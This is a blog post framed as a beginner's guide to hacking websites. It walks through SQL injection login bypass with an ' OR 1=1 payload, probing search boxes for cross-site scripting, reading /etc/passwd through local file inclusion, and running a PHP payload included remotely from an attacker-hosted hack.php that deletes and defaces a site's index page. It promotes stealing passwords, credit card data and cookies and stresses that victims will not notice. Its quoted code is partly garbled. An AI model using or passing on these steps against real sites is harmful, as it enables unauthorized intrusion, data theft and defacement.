Sunday, July 21, 2019

Hacking Website Using SQL Injection (Basic)

In essence, a website is just a floating something, a manifestation of the data stored
someplace else. So in hacking into a website, you are essentially hacking into a server -
some of the most secure entities in cyberspace (or not, depending on your luck). Sounds
like fun? Remember that some of the most notorious hacking that made the headlines run
along these lines. And of course, successfully hacking a website entails a good deal of
technical proficiency, especially PHP and HTML.


SQL Injection

This is simply the act of injecting your own, home-brewed SQL commands into an
existing web-script, allowing you to manipulate the database however you wish. There are
different ways to use SQL injection:

  • Bypassing log-in verification
  • Adding a new Admin account
  • Lifting passwords
  • Lifting credit card information
  • Accessing any and every part of the database

Of course, these will only work if the SQL used in the website is vulnerable. An example

is a log in script that simply takes the username and password input (without filtering it)

and compares it with the user’s value from its database in order to check the input’s
validity. This might seem like a really simple-minded way of authenticating log in
credentials, but real programmers use it in real-world scenarios. Don’t ask us why.

Step by Step Guide

To know if a certain script is injectable, simply enclose your inputs with double
quotation. If an error occurs, it is most likely injectable. If the display goes blank, then it
might be injectable but you will have to go through blind SQL injection (which is never a
walk in the park). If anything else happens, then it is not injectable.

Let’s say that we know the admin username: Administrator. Since the log in system does
not filter the input, we can simply insert anything into the statement. In the above faulty
code, we can put “‘ OR 1=1–” in the password box. This will result in the following SQL
query to be run in the database:

“SELECT ‘IP’ FROM ‘users’ WHERE ‘username’=’Administrator’ AND ‘password=’’
OR 1=1-’”

We know that the OR query only needs one question in order to succeed with a TRUE
value. Since 1=1, the answer is always true and the ending dash cancels out the final
double quotation, we end up with the correct syntax for the query.

XSS (Cross-Site Scripting)

f you have been hanging around the Internet as much as you should have (to be a hacker,
at least), you would have at least heard of this term. This allows the attacker’s input to be
sent to unwary victims. The primary use is cookie stealing - and no, not the type your
sadistic older sibling does. Once the attacker steals yours, they can log into the site the
cookie is stolen from using your identity and under the right conditions.

This vulnerability can be determined using the site’s search facility. Try feeding it with
some HTML, such as “<font color=green>XSS</font>”. If the word XSS comes up, then
the site is vulnerable. Else, you need to find a different way in.

RFI/LFI (Remote/Local File Include)

This is a type of vulnerability that allows a user to include remote or local files, having it
parsed and then executed on the server.

To see if a certain website is vulnerable to this issue, try visiting “index.php?
p=http://www.<DOMAIN NAME>.com/”. If the site shows up, then it can be exploited
with RFI or LFI. If a different thing appears, then the site is not vulnerable to RFI - this
does not necessarily mean it is safe from LFI, however. To verify, go for “index.php?
p=/etc/passwd”. This is assuming the server is running on a *nix-based system. If you can
view the password file, then the server can be hacked by LFI. If something else appears,
then RFI and LFI both won’t work.

If the target is found to be vulnerable to RFI, you can upload a PHP code to their server
PHP. Let’s say you create the following under the file hack.php:


<?php
Unlink(“ïndex.php”);
System(“echo GOTCHA > index.php””);
?>


Once you view “index.php?=http://<DOMAIN NAME>.com/hack.php””, then the code

will be run on the server. When this is done, the site will change to the simple GOTCHA
message and none will be the wiser.